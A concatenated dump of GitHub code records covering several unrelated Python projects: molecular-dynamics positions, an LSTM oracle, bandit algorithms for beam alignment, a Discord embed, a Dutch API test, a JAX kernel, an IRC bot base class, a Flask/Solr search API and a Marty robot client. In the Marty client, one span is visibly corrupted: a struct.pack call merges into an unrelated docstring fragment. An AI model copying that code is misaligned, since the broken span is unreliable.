com_sites=surface_parameters.com_sites)\n\n mol_traj = np.concatenate([mol_traj, mol_chunk])\n com_traj = np.concatenate([com_traj, com_chunk])\n cell_dim = np.concatenate([cell_dim, cell_dim_chunk])\n\n vec_chunk = orientation(\n traj, surface_parameters.center_atom,\n surface_parameters.vector_atoms\n )\n mol_vec = np.concatenate([mol_vec, vec_chunk])\n\n return mol_traj, com_traj, cell_dim, mol_vec\n\n\ndef check_pbc(xmol, ymol, zmol, pivots, dim, max_r=30):\n \"\"\"\n Check periodic boundary conditions of molecule positions\n to ensure most appropriate position along is used wrt each\n surface.\n\n Parameters\n ----------\n xmol: float, array_like; shape=(nmol)\n Molecular coordinates in x dimension\n ymol: float, array_like; shape=(nmol)\n Molecular coordinates in y dimension\n zmol: float, array_like; shape=(nmol)\n Molecular coordinates in z dimension\n pivots: float, array_like\n Indices of pivot molecules\n dim: float\n Cell dimensions\n max_r: float\n Maximum distance between neighbours\n\n Returns\n -------\n zmol: float, array_like; shape=(nmol)\n Molecular coordinates in z dimension using most\n appropriate PBC\n \"\"\"\n\n # Create pivot map\n for index_i, pivot in enumerate(pivots):\n p_map = np.isin(np.arange(zmol.size), pivot)\n\n for check in range(2):\n for index_j, n in enumerate(pivot):\n\n dxyz = np.stack(\n (xmol[p_map] - xmol[n],\n ymol[p_map] - ymol[n],\n zmol[p_map] - zmol[n])\n )\n for index_k, l in enumerate(dim[:2]):\n dxyz[index_k] -= l * np.array(\n 2 * dxyz[index_k] / l, dtype=int)\n\n dr2 = np.sum(dxyz**2, axis=0)\n neighbour_count = np.count_nonzero(dr2 < max_r**2)\n\n dxyz[2] += dim[2] * np.array([-1, 1])[index_i]\n dr2 = np.sum(dxyz**2, axis=0)\n neighbour_count_flip = np.count_nonzero(dr2 < max_r**2)\n\n if neighbour_count_flip > neighbour_count:\n zmol[n] += dim[2] * np.array([1, -1])[index_i]\n\n return zmol\n","repo_name":"franklongford/ALIAS","sub_path":"alias/src/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
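A quick worked example of the minimum-image rule used by minimum_image() in the alias positions.py record above — a minimal standalone sketch assuming only numpy (the box size and displacement values are illustrative, not from the record):

import numpy as np

# Shift each displacement component by whole box lengths so it ends up
# within roughly half a box length of zero, as minimum_image() does.
box = np.array([10.0, 10.0, 10.0])
d = np.array([[9.0, -6.0, 4.0]])  # raw inter-particle displacement
for i, dim in enumerate(box):
    d[..., i] -= dim * np.rint(d[..., i] / dim)
print(d)  # [[-1.  4.  4.]]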
+{"seq_id":"6388076057","text":"import codecs\nimport os\nimport pickle\n\nimport numpy as np\n\nfrom utils.file_handler import write_text\nfrom metrics.oracle.target_lstm import TARGET_LSTM\n\n\nclass Oracle_LSTM(TARGET_LSTM):\n def __init__(self, num_emb=5000, batch_size=128, emb_dim=3200, hidden_dim=32, sequence_length=20, start_token=0,\n params=None,\n sess_config=None):\n import tensorflow as tf\n if params is None:\n current_dir = os.path.dirname(os.path.abspath(__file__))\n full_path = os.path.join(current_dir, \"target_params_py3.pkl\")\n with codecs.open(full_path, \"rb\") as f:\n params = pickle.load(f)\n self.graph_obj = tf.Graph()\n with self.graph_obj.as_default():\n super().__init__(num_emb, batch_size, emb_dim, hidden_dim, sequence_length, start_token, params)\n if sess_config is None:\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=self.graph_obj, config=sess_config)\n self.sess.run(tf.global_variables_initializer())\n\n def generate(self, number=None):\n if number is None:\n number = self.batch_size\n generated_number = 0\n tmp = []\n while generated_number < number:\n tmp.append(super().generate(self.sess))\n generated_number += tmp[-1].shape[0]\n return np.concatenate(tmp, axis=0)[:number, :]\n\n def log_probability(self, inp):\n if type(inp) is np.ndarray:\n assert len(inp.shape) == 2 and inp.shape[1] == self.sequence_length\n elif type(inp) is list:\n inp = np.array(inp)\n assert len(inp.shape) == 2 and inp.shape[1] == self.sequence_length\n else:\n raise ValueError\n\n inp_len = inp.shape[0]\n res = np.ones(inp_len) * np.nan\n\n new_inp = np.concatenate((inp, np.zeros(((-1 * inp_len) % self.batch_size, self.sequence_length))), axis=0)\n assert new_inp.shape[0] % self.batch_size == 0, new_inp.shape\n for start_inx in range(0, new_inp.shape[0], self.batch_size):\n end_inx = start_inx + self.batch_size\n tmp = self.sess.run(self.out_loss, {self.x: new_inp[start_inx:end_inx]})\n res[start_inx:min(end_inx, inp_len)] = tmp[:min(end_inx, inp_len) - start_inx]\n print(res.shape)\n return -1. 
* res\n\n\nif __name__ == \"__main__\":\n oracle = Oracle_LSTM(batch_size=64)\n x = oracle.generate(37500)\n x = [\" \".join([str(xxx) for xxx in xx]) for xx in x]\n write_text(x, 'oracle37.5-train')\n","repo_name":"Danial-Alh/TextGenerationEvaluator","sub_path":"src/metrics/oracle/oracle_lstm.py","file_name":"oracle_lstm.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40827546185","text":"\"\"\"\nThis module implements the UCB and linUCB algorithms used for beam alignment\nand tracking problems.\n\"\"\"\nfrom dataclasses import dataclass\nimport numpy as np\nfrom typing import List\n\n\n@dataclass\nclass ARM:\n # i-th beamforming of BS\n i: int = None\n # j-th beamforming of UE\n j: int = None\n # number of times this arm is played\n n_play: int = 0\n\n\n@dataclass\nclass ArmUCB(ARM):\n # mean reward\n mu: float = 0\n\n\nclass UCB:\n def __init__(self, arms: List[ArmUCB], delta: float) -> None:\n # list of all arms\n self.arms = arms\n # number of arms\n self.n_arms = len(arms)\n # uncertainty probability\n self.delta = delta\n\n def select_arm(self, t: int) -> int:\n \"\"\"\n Select an arm to pull.\n\n Args:\n t (int): the time index.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n if t < self.n_arms:\n return t\n else:\n # upper confidence bound for all arms\n ucb = [\n arm.mu + np.sqrt(2 * np.log10(1/self.delta) / arm.n_play)\n for arm in self.arms\n ]\n return np.argmax(ucb)\n\n def pull_arm(self, k: int, r: float) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when k-th arm is pulled.\n \"\"\"\n # update the estimated reward\n self.arms[k].mu = (self.arms[k].mu * self.arms[k].n_play + r) / (\n self.arms[k].n_play + 1\n )\n # update the number of arms that have been played\n self.arms[k].n_play += 1\n\n\n@dataclass\nclass ArmLinUCB(ARM):\n # matrix A, this is used in LinUCB\n A: np.array = None\n # vector b, this is used in LinUCB\n b: np.array = None\n # the estimated vector phi, or coefficient vector\n # this is used in LinUCB\n phi: np.array = None\n\n\nclass LinUCB:\n # Implement the LinUCB algorithm\n # References: Li, Lihong, et al. \"A contextual-bandit approach to\n # personalized news article recommendation.\" Proceedings of the 19th\n # international conference on World wide web. 
2010.\n def __init__(\n self, arms: List[ArmLinUCB], delta: float = 0.05, d: int = 2\n ) -> None:\n # list of all arms\n self.arms = arms\n # Initialize phi and b as zero vectors\n # Initialize A as an Identity vector\n for arm in arms:\n arm.phi = np.zeros((d, 1))\n arm.A = np.eye(d)\n arm.b = np.zeros((d, 1))\n # number of arms\n self.n_arms = len(arms)\n # the LinUCB parameter delta, where 1 - delta is the probability of\n # guaranteeing the inequality.\n self.delta = delta\n # the dimension of the contextual vector is d x 1\n self.d = d\n\n def select_arm(self, x: np.array) -> int:\n \"\"\"\n Select an arm to pull.\n\n Args:\n x (np.array): the contextual vector in the corresponding timeslot.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n alpha = 1 + np.sqrt(0.5 * np.log(2 / self.delta))\n\n def calc_p(arm: ArmLinUCB) -> float:\n \"\"\"\n Calculate the p_{t,a} for the ARM a.\n Note that all the values of A, D, c and phi were already updated\n in the attributes of the arm.\n \"\"\"\n return np.mat(x).T * np.mat(arm.phi) + alpha * np.sqrt(\n np.mat(x).T * np.linalg.inv(arm.A) * np.mat(x)\n )\n\n return np.argmax([calc_p(arm) for arm in self.arms])\n\n def pull_arm(self, k: int, r: float, x: np.array) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when the k-th arm is pulled.\n x (np.array): The contextual vector in the corresponding timeslot.\n \"\"\"\n # update matrix A and vector b\n self.arms[k].A = self.arms[k].A + np.mat(x) * np.mat(x).T\n self.arms[k].b = self.arms[k].b + r * np.mat(x)\n # update new estimation of phi\n self.arms[k].phi = np.linalg.inv(self.arms[k].A) * np.mat(\n self.arms[k].b\n )\n # update the number of times the arm is pulled\n self.arms[k].n_play += 1\n\n\n@dataclass\nclass ArmExp3(ARM):\n # weight for each arm, initialized as 1\n w: float = 1\n # probability of selecting this arm\n p: float = None\n\n\nclass Exp3:\n # Implement the Exp3 algorithm\n # Paper: The non-stochastic multi-armed bandit problem.\n def __init__(self, arms: List[ArmExp3], gamma: float = 0.9) -> None:\n # the list of arms\n self.arms = arms\n # learning rate in the range [0, 1]\n self.gamma = gamma\n\n def select_arm(self) -> int:\n \"\"\"\n Select an arm to pull.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n sum_weights = np.sum([arm.w for arm in self.arms])\n # Calculate the probability for each arm\n for arm in self.arms:\n arm.p = (1 - self.gamma) * arm.w / sum_weights + self.gamma / len(\n self.arms\n )\n # print('Probability:', [arm.p for arm in self.arms])\n # print('Weights:', [arm.w for arm in self.arms])\n return np.random.choice(\n range(len(self.arms)), p=[arm.p for arm in self.arms]\n )\n\n def pull_arm(self, k: int, r: float) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when k-th arm is pulled.\n \"\"\"\n self.arms[k].n_play += 1\n # only update the weight of the selected arm\n # estimated reward\n x_hat = r / self.arms[k].p\n self.arms[k].w *= np.exp(self.gamma * x_hat / len(self.arms))\n","repo_name":"SonDinhVan/beam_training_contextual_bandits_THz","sub_path":"modules/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31823147783","text":"from discord import Embed, Colour\n\nfrom config import 
png_strip_for_embed, png_butterfly_gif\n\n\nclass AcceptedClanCloseEmbed(object):\n def __init__(self, clan_name):\n self._embed = Embed(\n description=f'***```Вы успешно приняли запрос на клоз\\nОжидайте ответ ивентера...```***',\n color=Colour(0x1FFF00)\n )\n self._embed.set_author(\n name=f'Ваш противник {clan_name}',\n icon_url=png_butterfly_gif),\n self._embed.set_image(url=png_strip_for_embed)\n\n @property\n def embed(self):\n return self._embed\n\n\n","repo_name":"BladeXses21/clan_staff_v1","sub_path":"main/src/embeds/clan_embed/clan_close/accepted_close.py","file_name":"accepted_close.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4593767959","text":"\"\"\"\nUit vng-Realisatie/gemma-zaken#169 en vng-Realisatie/gemma-zaken#45 blijkt dat\nhet mogelijk moet zijn om de behandelaar toe te wijzen aan een zaak.\n\nDit kan automatisch uit de zaaktypecatalogus (op basis van zaaktype), of\ndoor een manuele actie van een KCC medewerker getriggered worden.\n\"\"\"\nfrom .constants import CATALOGUS_UUID, ZAAKTYPE_UUID\n\n\ndef test_zet_behandelaar_op_basis_van_zaaktype(zrc_client, ztc_client):\n # vraag zaaktype op\n zaaktype = ztc_client.retrieve('zaaktype', catalogus_uuid=CATALOGUS_UUID, uuid=ZAAKTYPE_UUID)\n\n zrc_client.auth.set_claims(\n scopes=['zds.scopes.zaken.aanmaken'],\n zaaktypes=[zaaktype['url']]\n )\n\n # maak een zaak aan\n zaak = zrc_client.create('zaak', {\n 'zaaktype': zaaktype['url'],\n 'bronorganisatie': '517439943',\n 'startdatum': '2018-06-18',\n 'registratiedatum': '2018-06-18',\n 'verantwoordelijkeOrganisatie': '223122166',\n })\n assert 'url' in zaak\n\n # vraag behandelaar op\n roltypen = ztc_client.list(\n 'roltype', catalogus_uuid=CATALOGUS_UUID, zaaktype_uuid=ZAAKTYPE_UUID,\n query_params={'omschrijvingGeneriek': 'Behandelaar'}\n )\n\n assert len(roltypen) == 1\n\n # zet de behandelaar\n behandelaar = roltypen[0]['mogelijkeBetrokkenen'][0]\n rol = zrc_client.create('rol', {\n 'zaak': zaak['url'],\n 'betrokkene': behandelaar['betrokkene'],\n 'betrokkeneType': behandelaar['betrokkeneType'],\n 'rolomschrijving': 'Behandelaar',\n 'roltoelichting': 'Automatisch toegewezen op basis van zaaktype',\n })\n\n assert 'url' in rol\n","repo_name":"VNG-Realisatie/gemma-zaken-test-integratie","sub_path":"tests/test_userstory_45.py","file_name":"test_userstory_45.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5655900947","text":"from typing import Any, Callable, Dict, Union\n\nimport jax\nimport jax.numpy as jnp\nimport pydantic\nfrom flax.core.frozen_dict import FrozenDict\n\nfrom src.kernels.base import KernelBase, KernelBaseParameters\nfrom src.module import PYDANTIC_VALIDATION_CONFIG\n\n\nclass CustomKernelParameters(KernelBaseParameters):\n \"\"\"\n The parameters of a custom kernel where the parameters can be any type.\n \"\"\"\n\n custom: Any\n\n\nclass CustomKernel(KernelBase):\n \"\"\"\n A wrapper class for any custom kernel function.\n \"\"\"\n\n Parameters = CustomKernelParameters\n\n def __init__(\n self,\n kernel_function: Callable[[Any, jnp.ndarray, jnp.ndarray], jnp.float64],\n preprocess_function: Callable = None,\n ):\n \"\"\"\n Define a kernel using a custom kernel function.\n\n Args:\n kernel_function: The kernel function provided by the NTK package.\n preprocess_function: preprocess inputs before passing to kernel function\n \"\"\"\n 
self.kernel_function = kernel_function\n KernelBase.__init__(self, preprocess_function=preprocess_function)\n\n @pydantic.validate_arguments(config=PYDANTIC_VALIDATION_CONFIG)\n def generate_parameters(\n self, parameters: Union[FrozenDict, Dict]\n ) -> CustomKernelParameters:\n return CustomKernel.Parameters(\n custom=parameters[\"custom\"],\n )\n\n def _calculate_gram(\n self,\n parameters: Union[Dict, FrozenDict, CustomKernelParameters],\n x1: jnp.ndarray,\n x2: jnp.ndarray,\n ) -> jnp.ndarray:\n \"\"\"\n Computing the Gram matrix with a custom kernel function.\n - m1 is the number of points in x1\n - m2 is the number of points in x2\n - d is the number of dimensions\n\n Args:\n parameters: parameters of the kernel\n x1: design matrix of shape (m1, d)\n x2: design matrix of shape (m2, d)\n\n Returns: the kernel gram matrix of shape (m_1, m_2)\n\n \"\"\"\n # convert to Pydantic model if necessary\n if not isinstance(parameters, self.Parameters):\n parameters = self.generate_parameters(parameters)\n return (\n jax.vmap(\n lambda x1_: jax.vmap(\n lambda x2_: self.kernel_function(parameters.custom, x1_, x2_)\n )(x2[:, None, ...])\n )(x1[:, None, ...])\n ).reshape(x1.shape[0], x2.shape[0])\n","repo_name":"jswu18/gvi-gaussian-process","sub_path":"src/kernels/custom_kernel.py","file_name":"custom_kernel.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44549271475","text":"import os\n\nfrom . import Stasher\nfrom .Settings import init_settings\n\nclass NoDefault: pass\n\nclass BaseModule:\n \"\"\"This class is intended to provide a number of convenient and common\n features for kibot modules.\"\"\"\n\n def __init__(self, bot):\n \"\"\"\n 1) set the bot attribute\n 2) load the stasher if any _stash_attrs are defined\n 3) initialize the settings (setting any defaults if empty)\n 4) set any _on_XXXX handlers with priority 0\n \"\"\"\n self.bot = bot\n if self._stash_attrs: self._unstash()\n\n try: self._settings = init_settings(self, self._settings)\n except AttributeError: pass\n\n self._set_handlers()\n\n def _unload(self):\n \"\"\"\n 1) save the stasher if any _stash_attrs are defined\n 2) remove any _on_XXXX handlers\n \"\"\"\n if self._stash_attrs: self._stash()\n self._del_handlers()\n\n ######################################################################\n # stasher\n _stash_format = 'pickle'\n _stash_attrs = []\n #_stash_file = 'foo.pickle' # will appear in the \"data_dir\"\n def _get_stasher(self, filename=None, stash_format=None, **kwargs):\n if not stash_format: stash_format = self._stash_format\n if not filename:\n def_stash_basename = \"%s.%s\" % (self.__class__.__name__,\n stash_format)\n filename = getattr(self, '_stash_file', def_stash_basename)\n stash_file = os.path.join(self.bot.op.files.data_dir, filename)\n return Stasher.get_stasher(stash_file, stash_format, **kwargs)\n\n def _stash(self, default=NoDefault):\n \"\"\"Store the attributes listed in self._stash_attrs in a stasher.\n One will be created if necessary. 
If a value isn't set and\n a default is provided, that value will be used.\"\"\"\n if not hasattr(self, '_stasher'):\n self._stasher = self._get_stasher(autosync=0)\n for attr in self._stash_attrs:\n try: value = getattr(self, attr)\n except AttributeError:\n if not default == NoDefault:\n self._stasher[attr] = default\n else: self._stasher[attr] = value\n self._stasher.sync()\n\n def _unstash(self, default=NoDefault):\n \"\"\"Reload the attributes listed in self._stash_attrs from the\n stasher. If the attribute was not in the stasher (or if the file\n didn't exist) then the attribute will be set to 'default'. If\n default is not provided, then the attribute will not be set at all.\"\"\"\n\n if not hasattr(self, '_stasher'):\n self._stasher = self._get_stasher(autosync=0)\n\n for attr in self._stash_attrs:\n if default == NoDefault:\n try: value = self._stasher[attr]\n except KeyError: pass\n else: setattr(self, attr, value)\n else:\n value = self._stasher.get(attr, default)\n setattr(self, attr, value)\n\n ##################################################################3\n # handlers\n def _get_handlers(self, prefix):\n \"\"\"return a list of all event types for which it looks like\n the module has handlers. If the module has defined _on_join and\n _on_kick, then this will return ['join', 'kick']\n\n if the attribute self._handlers is defined, it will be returned\n instead\n \"\"\"\n try:\n handlers = self._handlers\n except AttributeError:\n handlers = []\n L = len(prefix)\n for f in dir(self):\n a = getattr(self, f)\n if callable(a) and f.startswith(prefix):\n handlers.append(f[L:])\n return handlers\n\n def _set_handlers(self, priority=0, prefix=\"_on_\"):\n \"\"\"set handlers for all methods with prefix \n For example, if the method _on_join is defined, then that method\n will be registered as handler for the \"join\" event.\n\n If the attribute self._handlers is defined, it will be used instead.\n each element of the self._handlers list should be the event type.\n\n def _handle_join(self, conn, event): pass\n def _handle_kick(self, conn, event): pass\n def _handle_part(self, conn, event): pass\n self._handlers = ['join', 'kick']\n self._set_handlers(prefix='_handle_')\n\n In this case, only the first two will be set. 
If self._handlers\n were not defined, then all three would be set.\n \"\"\"\n handlers = self._get_handlers(prefix)\n for h in handlers:\n self.bot.set_handler(h, getattr(self, prefix + h), priority)\n\n def _del_handlers(self, prefix=\"_on_\"):\n \"\"\"This \"undoes\" self._set_handlers\"\"\"\n handlers = self._get_handlers(prefix)\n for h in handlers:\n self.bot.del_handler(h, getattr(self, prefix + h))\n","repo_name":"pteichman/kibot","sub_path":"kibot/BaseModule.py","file_name":"BaseModule.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"70804376465","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\nfrom flask import request\nimport json\nimport pysolr\nimport sys\nsys.path.append(\"/home/luuthanh/Desktop/TKTD/backend\")\nfrom process_function import Query\n\n# configuration\nDEBUG = True\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app, resources={r'/*': {'origins': '*'}})\n\n#connect Solr\npath = \"http://localhost:8983/solr/TestConfig/\"\n\n# sanity check route\n\n@app.route('/api', methods = ['POST'])\ndef get_results():\n str_a = request.data.decode(\"utf-8\")\n dict = json.loads(str_a)\n print(dict)\n rq = Query(lan=\"vi\",show_score= True ,start=0,rows=40,request_dict=dict,connect_solr=path)\n arr_results,time, hits = rq.get_results()\n time_str = \"Khoảng {} kết quả. Truy vấn hết {} ms\".format(hits,time)\n print(rq.get_results()[1])\n return jsonify(arr_results = arr_results, time = time_str )\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"cuonghp2112/TKTD","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71246326227","text":"import six\nimport struct\nfrom .utils import dict_merge\nfrom .serialclient import SerialClient\nfrom .socketclient import SocketClient\nfrom .rosclient import ROSClient\nfrom .testclient import TestClient\nfrom .exceptions import (MartyCommandException,\n MartyConnectException,\n MartyConfigException,\n ArgumentOutOfRangeException)\n\n\nclass Marty(object):\n '''\n High-level client library for Marty the Robot by Robotical Ltd\n '''\n\n CLIENT_TYPES = {\n 'socket' : SocketClient,\n 'serial' : SerialClient,\n 'ros' : ROSClient,\n 'test' : TestClient,\n }\n\n def __init__(self, url='socket://marty.local',\n client_types=dict(),\n default_lifelike=True,\n *args, **kwargs):\n '''\n Initialise a Marty client class from a url\n\n Args:\n url: Describes where the Marty can be found and what protocol it's speaking\n\n Raises:\n MartyConnectException if the client couldn't be initialised\n '''\n\n proto, _, loc = url.partition('://')\n\n self.CLIENT_TYPES = dict_merge(self.CLIENT_TYPES, client_types)\n\n if not (proto and loc):\n raise MartyConfigException('Invalid URL format \"{}\" given'.format(url))\n\n if proto not in self.CLIENT_TYPES.keys():\n raise MartyConfigException('Unrecognised URL protocol \"{}\"'.format(proto))\n\n # Initialise the client class used to communicate with Marty\n self.client = self.CLIENT_TYPES[proto](proto, loc, *args, **kwargs)\n\n # To be able to do anything:\n self.enable_safeties(True)\n self.enable_motors(True)\n\n if default_lifelike:\n self.lifelike_behaviour(True)\n\n\n def _pack_uint16(self, num):\n '''\n Pack an unsigned 16 bit int into two 8 bit bytes, little-endian\n 
Returns:\n tuple(least-sig-byte, most-sig-byte)\n\n Struct:\n Fmt C Type Python Type Standard Size\n h short/uint16 integer 2\n '''\n try:\n data = struct.pack('= 0 (non-negative)\n '''\n return bool(self.client.execute('gpio', self._pack_uint8(gpio)))\n\n\n def i2c_write(self, *byte_array):\n '''\n Write a bytestream to the i2c port.\n The first byte should be the address, following from that\n the datagram folows standard i2c spec\n '''\n return self.client.execute('i2c_write', *byte_array)\n\n\n def i2c_write_to_rick(self, address, byte_array):\n '''\n Write a formatted bytestream to the i2c port.\n The bytestream is formatted in the ROS serial format.\n\n address: the other device's address\n '''\n\n data = ['\\x1B'] #i2c_write opcode\n data.append(address) #i2c address\n data.append(byte_array) #message\n data += self.ros_serial_formatter(111, *byte_array) #ros serial format\n return self.client.execute('i2c_write', *data)\n\n def get_battery_voltage(self):\n '''\n Returns:\n The battery voltage reading as a float in Volts\n '''\n return self.client.execute('battery')\n\n\n ACCEL_AXES = {\n 'x' : '\\x00',\n 'y' : '\\x01',\n 'z' : '\\x02',\n }\n\n\n def get_accelerometer(self, axis):\n '''\n Args:\n axis: str 'x', 'y' or 'z'\n Returns:\n The most recently read x, y and z accelerations\n '''\n try:\n ax = self.ACCEL_AXES[axis]\n except KeyError:\n raise MartyCommandException(\"Axis must be one of {}, not '{}'\"\n \"\".format(set(self.ACCEL_AXES.keys()), axis))\n return self.client.execute('accel', ax)\n\n\n def get_motor_current(self, motor_id):\n '''\n Args:\n motor_id, integer >= 0 (non-negative) selects which motor to query\n Returns:\n Instantaneous current sense reading from motor `motor_id`\n '''\n return self.client.execute('motorcurrent', str(motor_id))\n\n\n def enable_motors(self, enable=True, clear_queue=True):\n '''\n Toggle power to motors\n Args:\n enable: True/False toggle\n clear_queue: Default True, prevents unfinished but 'muted' motions\n from jumping as soon as motors are enabled\n '''\n if clear_queue:\n self.stop('clear queue')\n if enable:\n return self.client.execute('enable_motors') and True\n else:\n return self.client.execute('disable_motors') and False\n\n\n def enable_safeties(self, enable=True):\n '''\n Tell the board to turn on 'normal' safeties\n '''\n return self.client.execute('enable_safeties')\n\n\n def fall_protection(self, enable=True):\n '''\n Toggle fall protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('fall_protection', enable)\n\n\n def motor_protection(self, enable=True):\n '''\n Toggle motor current protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('motor_protection', enable)\n\n\n def battery_protection(self, enable=True):\n '''\n Toggle low battery protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('battery_protection', enable)\n\n\n def buzz_prevention(self, enable=True):\n '''\n Toggle motor buzz prevention\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('buzz_prevention', enable)\n\n\n def lifelike_behaviour(self, enable=True):\n '''\n Tell the robot whether it can or can't move now and then in a lifelike way when idle.\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('lifelike_behaviour', enable)\n\n\n def set_parameter(self, *byte_array):\n '''\n Set board parameters.\n\n Args:\n byte_array: a list in the following format [paramID, params]\n '''\n return self.client.execute('set_param', 
'\\x1F',*byte_array)\n\n\n def save_calibration(self):\n '''\n Set the current motor positions as the zero positions\n BE CAREFUL, this can cause unexpected movement or self-interference\n '''\n return self.client.execute('save_calibration')\n\n\n def clear_calibration(self):\n '''\n Tell the Robot to forget it's calibration\n BE CAREFUL, this can cause unexpected movement or self-interference\n '''\n return self.client.execute('clear_calibration')\n\n\n def ros_command(self, *byte_array):\n '''\n Low level proxied access to the ROS Serial API between\n the modem and main controller\n '''\n return self.client.execute('ros_command', *byte_array)\n\n\n def keyframe (self, time, num_of_msgs, msgs):\n '''\n Takes in information about movements and generates keyframes\n returns a list of bytes\n\n time: time (in seconds) taken to complete movement\n num_of_msgs: number of commands sent\n msgs: commands sent in the following format [(ID CMD), (ID CMD), etc...]\n '''\n processed_keyframe = []\n\n #Number of key frames\n len_byte0, len_byte1, len_byte2, len_byte3 = self._pack_int32(1)\n processed_keyframe.append(len_byte0)\n processed_keyframe.append(len_byte1)\n processed_keyframe.append(len_byte2)\n processed_keyframe.append(len_byte3)\n\n #Time (in seconds) to excute keyframe. This is float encoded.\n time_byte0, time_byte1, time_byte2, time_byte3 = self._pack_float(time)\n processed_keyframe.append(time_byte0)\n processed_keyframe.append(time_byte1)\n processed_keyframe.append(time_byte2)\n processed_keyframe.append(time_byte3)\n\n if(len(msgs) != num_of_msgs):\n raise MartyCommandException('Number of messages do not match entered messages')\n #Array length\n arr_len_byte0, arr_len_byte1, arr_len_byte2, arr_len_byte3 = self._pack_int32(num_of_msgs)\n processed_keyframe.append(arr_len_byte0)\n processed_keyframe.append(arr_len_byte1)\n processed_keyframe.append(arr_len_byte2)\n processed_keyframe.append(arr_len_byte3)\n\n #Messages\n for items in msgs:\n for values in items:\n processed_keyframe.append(self._pack_int8(values))\n\n return(processed_keyframe)\n\n\n\n def get_chatter(self):\n '''\n Return chatter topic data (variable length)\n '''\n return self.client.execute('chatter')\n\n\n def get_firmware_version(self):\n '''\n Ask the board to print the firmware version over chatter\n '''\n return self.client.execute('firmware_version')\n\n\n def _mute_serial(self):\n '''\n Mutes the internal serial line on Rick. Depends on platform and API\n NOTE: Once you've done this, the Robot will ignore you until you cycle power.\n '''\n return self.client.execute('mute_serial')\n\n\n def ros_serial_formatter(self, topicID, *message):\n '''\n Formats message into ROS serial format and\n returns formatted message as a list\n\n More information about the ROS serial format can be\n found here: http://wiki.ros.org/rosserial/Overview/Protocol\n '''\n msg = message\n\n msg_length = len(msg)\n #Message length in little endian format\n msg_length_LB = msg_length & 0xFF #3rd byte\n msg_length_HB = (msg_length >> 8) & 0xFF #4th byte\n\n checksum1 = 255 - ((msg_length_LB + msg_length_HB) % 256) #5th byte\n\n #Topic ID in little endian format\n topic_ID_LB = topicID & 0xFF #6th byte\n topic_ID_HB = (topicID >> 8) & 0xFF #7th byte\n\n data_values_sum = 0\n for i in msg:\n data_values_sum += ord(i)\n\n checksum2 = 255 - ((topic_ID_LB + topic_ID_HB + data_values_sum) % 256) #final byte\n\n #encode into bytes\n command_to_be_sent = []\n command_to_be_sent += ('\\xff',) #Sync Flag. 
Check ROS Wiki\n command_to_be_sent += ('\xfe',) #Protocol version. Check ROS Wiki\n command_to_be_sent += (chr(msg_length_LB),)\n command_to_be_sent += (chr(msg_length_HB),)\n command_to_be_sent += (chr(checksum1),)\n command_to_be_sent += (chr(topic_ID_LB),)\n command_to_be_sent += (chr(topic_ID_HB),)\n command_to_be_sent += msg\n command_to_be_sent += (chr(checksum2),)\n\n return(command_to_be_sent)\n\n\n def ros_processed_command(self, topicID, *message):\n '''\n Formats message into ROS serial format then calls\n ros_command with the processed message.\n\n More information about the ROS serial format can be\n found here: http://wiki.ros.org/rosserial/Overview/Protocol\n '''\n msg = message\n\n msg_length = len(msg)\n #Message length in little endian format\n msg_length_LB = msg_length & 0xFF #3rd byte\n msg_length_HB = (msg_length >> 8) & 0xFF #4th byte\n\n checksum1 = 255 - ((msg_length_LB + msg_length_HB) % 256) #5th byte\n\n #Topic ID in little endian format\n topic_ID_LB = topicID & 0xFF #6th byte\n topic_ID_HB = (topicID >> 8) & 0xFF #7th byte\n\n data_values_sum = 0\n for i in msg:\n data_values_sum += ord(i)\n\n checksum2 = 255 - ((topic_ID_LB + topic_ID_HB + data_values_sum) % 256) #final byte\n\n #encode into bytes\n command_to_be_sent = []\n command_to_be_sent += ('\xff',) #Sync Flag. Check ROS Wiki\n command_to_be_sent += ('\xfe',) #Protocol version. Check ROS Wiki\n command_to_be_sent += (chr(msg_length_LB),)\n command_to_be_sent += (chr(msg_length_HB),)\n command_to_be_sent += (chr(checksum1),)\n command_to_be_sent += (chr(topic_ID_LB),)\n command_to_be_sent += (chr(topic_ID_HB),)\n command_to_be_sent += msg\n command_to_be_sent += (chr(checksum2),)\n\n 